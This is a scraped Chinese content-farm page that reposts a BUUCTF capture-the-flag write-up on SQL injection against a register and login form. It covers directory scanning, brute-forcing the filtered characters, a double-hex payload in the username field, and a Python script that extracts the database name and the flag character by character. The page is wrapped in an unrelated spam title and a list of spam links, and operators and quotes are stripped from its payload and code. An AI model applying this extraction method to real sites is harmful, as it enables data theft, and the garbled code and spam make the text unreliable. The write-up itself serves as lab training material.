当前位置: 首页 > news >正文

登封郑州网站建设在线制作国庆头像

登封郑州网站建设,在线制作国庆头像,装修公司加盟合作模式,做招聘网站多少钱目录 使用dirmap扫描 使用dirsearch扫描 使用acunetix扫描 爆破后端过滤的字符 绕过限制获取数据 这次的进行SQL注入的靶机是#xff1a;BUUCTF在线评测 进入到主页面后发现是可以进行登录的#xff0c;那么我们作为一个安全人员#xff0c;那肯定不会按照常规的方式来…目录 使用dirmap扫描 使用dirsearch扫描 使用acunetix扫描 爆破后端过滤的字符 绕过限制获取数据 这次的进行SQL注入的靶机是BUUCTF在线评测 进入到主页面后发现是可以进行登录的那么我们作为一个安全人员那肯定不会按照常规的方式来进行我们可以尝试扫描一下该网站看是否可以扫描出源码 使用dirmap扫描 python dirmap.py -i http://199cdbee-7e05-404f-9714-5263cd95132e.node5.buuoj.cn:81/ -lcf 注如果在使用该工具时一些依赖包没有可以使用下列命令来安装 pip install -r requirement.txt -i https://pypi.tuna.tsinghua.edu.cn/simple注如果出现下列报错则将Ip.py文件中的下列函数进行替换就可以解决了 修改完就可以正常的使用dirmap进行扫描了 使用dirsearch扫描 遗憾的是使用这两款扫描工具都没有扫描出有用的信息 使用acunetix扫描 那么我们可以再使用acunetix扫描一下 通过使用acunetix对网站进行扫描后发现网站还存在一个register.php页面 那么就可以访问一下 可以看到这是一个注册页面 那么我们可以尝试注入一个用户然后查看一下会有什么效果 注册完成后我们登录 可以看到登录页面是上面那样的 那么现在我们就可以在注册页面看是否可以进行注入 但是点击注册后页面却显示nnnnnnooooo 爆破后端过滤的字符 这就说明我们输入的内容中有些字符被后端检测到因此显示了该页面 因此现在我们需要编辑一个字典来将可能被过滤的字符集合起来然后使用Burpsuite抓包使用爆破模块看看那些字符被过滤了 根据爆破结果发现后端过滤了,  和information 绕过限制获取数据 现在后端过滤的字符我们已经知道了现在考虑如何在不使用那些字符来实现注入 我们可以使用substring( from 位置 for  截取数量 )来代替 然后我们就可以构造下列payload email123qq.comusername0(select hex(hex(database())))0password123456 注册完成后我们登录 发现用户名是这样的这是因为我们对其进行了两次16进制编码现在再进行两次解码即可 通过两次编码后就成功的得到了数据库名为web 但是因为过滤了information无法获取表这里借鉴别人的经验知道表名大概率都是flag因此我们直接使用下列脚本来获取表名/flag import requests import time from bs4 import BeautifulSoup #html解析器def getDatabase():database for i in range(10):data_database {username:0ascii(substr((select database()) from str(i1) for 1))0,password:admin,email:admin11admin.comstr(i)}#注册requests.post(http://2681d301-1d48-4f84-9dee-12d427fbed79.node5.buuoj.cn:81/register.php,data_database)login_data{password:admin,email:admin11admin.comstr(i)}responserequests.post(http://2681d301-1d48-4f84-9dee-12d427fbed79.node5.buuoj.cn:81/login.php,login_data)htmlresponse.text #返回的页面soupBeautifulSoup(html,html.parser)getUsernamesoup.find_all(span)[0]#获取用户名usernamegetUsername.textif int(username)0:breakdatabasechr(int(username))return databasedef getFlag():flag for i in range(40):data_flag {username:0ascii(substr((select * from flag) from str(i1) for 1))0,password:admin,email:admin32admin.comstr(i)}#注册requests.post(http://2681d301-1d48-4f84-9dee-12d427fbed79.node5.buuoj.cn:81/register.php,data_flag)login_data{password:admin,email:admin32admin.comstr(i)}responserequests.post(http://2681d301-1d48-4f84-9dee-12d427fbed79.node5.buuoj.cn:81/login.php,login_data)htmlresponse.text #返回的页面soupBeautifulSoup(html,html.parser)getUsernamesoup.find_all(span)[0]#获取用户名usernamegetUsername.textif int(username)0:breakflagchr(int(username))return flagprint(getDatabase()) print(getFlag()) 注需要将代码中的url替换为自己的
http://www.w-s-a.com/news/918674/

相关文章:

  • 多个图表统计的网站怎么做百度推广费2800元每年都有吗
  • 连江县住房和城乡建设局网站企业类网站模版
  • 临沂seo整站优化厂家网站建设 大公司排名
  • 网站开发有哪些方式百度导航怎么下载
  • 网站认证免费视频直播网站建设方案
  • 瀑布流分享网站源代码下载网站构建的一般流程是什么
  • wordpress 4.9 多站wordpress邮箱解析
  • 微信网站开发企业汽车网站设计模板
  • 如何提升网站转化率遵义市公共资源交易平台
  • 网站目录管理模板企业解决方案部
  • 建设网站上申请劳务资质吗珠海哪个公司建设网站好
  • c2c商城网站建设在微信怎么开发公众号
  • 美的公司网站建设的目的做个网站要钱吗
  • 和县建设局网站孟州网站建设
  • 网站与规划设计思路竞价培训课程
  • 网站建设设计视频专业设计企业网站
  • 湖南省建设工程网站cerntos wordpress
  • 主机屋的免费空间怎么上传网站广告公司的经营范围有哪些
  • 门户网站建设公司案例门户建设是什么意思
  • 深圳seo专家东莞网站关键词优化排名
  • 套用别人产品图片做网站如何在阿里云自主建网站
  • 网站开发需要用哪些东西wordpress页面参数
  • 大连模板网站制作哪家好wordpress 安装不上
  • 宝塔搭建网站首页图片点击率如何提高
  • 长沙找人做网站wordpress如何安装模板
  • 比较好的国外网站建设公司wordpress短代码可视化
  • 做新的网站网站个性化
  • 吉安做网站的英文网站 字体大小
  • 外贸网站服务商wordpress主题handsome
  • 云主机多个网站如何优化网站图片